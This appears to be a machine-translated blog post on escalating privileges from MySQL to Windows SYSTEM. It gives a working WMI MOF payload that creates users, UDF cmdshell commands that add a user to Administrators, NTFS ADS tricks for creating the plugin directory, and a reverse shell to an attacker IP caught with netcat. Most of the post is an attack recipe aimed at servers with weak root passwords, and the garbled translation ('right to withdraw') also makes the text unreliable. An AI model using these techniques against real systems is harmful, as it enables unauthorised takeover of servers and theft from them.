Summary of MySQL right to withdraw

Recently in the test of a project, met the MySQL database, to the best way to power, and ultimately did not succeed, is depressed, may be a long time no research has led to the right, summed up the MySQL right of all kinds of posture bar, right when review. There are a few ways to get the right out of MySQL, and I hope you can help your little friends.

I. Use of MOF to extract rights

A while ago foreign Kingcope Daniel released the MySQL Remote Power 0day (MySQL Windows remote System level Exploit (Stuxnet technique) 0day), The sword Heart Cow to the MOF utilization analysis, As follows:

Windows Management Instrumentation (WMI) provides the following three ways to compile Managed Object Format (MOF) files into the WMI repository:

Method 1: Run the MOF file that specifies the Mofcomp.exe file as the command-line parameter.

Method 2: Use the Imofcompiler interface and the Compilefile method.

Method 3: Drag-and-drop the MOF file into the%systemroot%\system32\wbem\mof folder.

Microsoft recommends that you compile the MOF file to the repository using the first two methods. That is, run the Mofcomp.exe file, or use the Imofcompiler::compilefile method.

The third method is provided only for backward compatibility with earlier versions of WMI, and should not be used since this feature may not be available after a future release.

specifically to the MySQL right, how should we use it?

1, find a writable directory to upload the MOF file, I uploaded here the C:/wmpub/nullevt.mof code as follows.

#pragma namespace ("\\\\.\\root\\subscription") instance of __EventFilter as $EventFilter {    eventnamespace = "root\\ Cimv2 ";    Name  = "filtP2";    Query = "SELECT * from __InstanceModificationEvent"            "Where targetinstance Isa \" Win32_localtime\ "" and            Targeti Nstance. Second = 5 ";    QueryLanguage = "WQL";}; Instance of Activescripteventconsumer as $Consumer {    Name = "consPCSV2";    Scriptingengine = "JScript";    ScriptText =    "var WSH = new ActiveXObject (\" Wscript.shell\ ") \nwsh.run (\" Net.exe User Waitalone waitalone.cn/add\ " )";}; Instance of __filtertoconsumerbinding{    Consumer   = $Consumer;    Filter = $EventFilter;};

　　

The 18th line of the command, please make your own changes before uploading.

2. Execute load_file and into DumpFile to export the file to the correct location.

Select Load_file (' C:/wmpub/nullevt.mof ') into DumpFile ' C:/windows/system32/wbem/mof/nullevt.mof '

After successful execution, you can add a normal user, and then you will be able to change the command, then carry out the execution to elevate the user to administrator privileges, then 3389 connection is OK.

Ii. use of the UDF to extract rights

UDF right This is the most common way to raise power, but often in the execution of the "can ' t open Shared Library" situation, where we can use the NTFS ads stream to solve this problem.

1, the most common is directly using udf.php this kind of tool to perform UDF right, as follows.

After connecting to MySQL, the pilot is udf.dll to the C:\Windows\System32 directory.

2. Create the appropriate function and execute the command, as follows:

Create function Cmdshell returns string Soname ' Udf.dll '; select Cmdshell (' Net user Waitalone waitalone.cn/add '); Select cm Dshell (' net localgroup Administrators Waitalone/add ');d rop function Cmdshell; Remove function Delete from Mysql.func where name= ' cmdshell '  delete function

　　

3, in some cases, we will encounter can ' t open shared library situation, we need to export Udf.dll to the Lib\plugin directory, but by default, plugin does not exist, how to do? It's good to have Daniel. Methods of creating folders using NTFS ads streams

SELECT @ @basedir;   Find the directory for MySQL select ' It is dll ' into DumpFile ' c:\\program Files\\mysql\\mysql Server 5.1\\lib:: $INDEX _allocation ';   Create lib directory with NTFS ads select ' It is dll ' into DumpFile ' c:\\program Files\\mysql\\mysql Server 5.1\\lib\\plugin:: $INDEX _ ALLOCATION ';//create plugin directory with NTFS ads

　　

The execution succeeds and then the export.

Third, the rebound port connection to raise the right

If we sweep to a MySQL root weak password, and can be connected, but the server above the site is not Getshell, then we do?

1. Use the MySQL client tool to connect to the MySQL server and perform the following actions.

Mysql.exe-h 172.16.10.11-uroot-penter password:mysql> \. C:\mysql.txtmysql>select Backshell ("Yourip", 2010);

2, local monitoring of your rebound port

Nc.exe-vv-l-P 2010

After success, you will get a system permission for the Cmdshell, in fact this is also the use of UDF right.

Summary of MySQL right to withdraw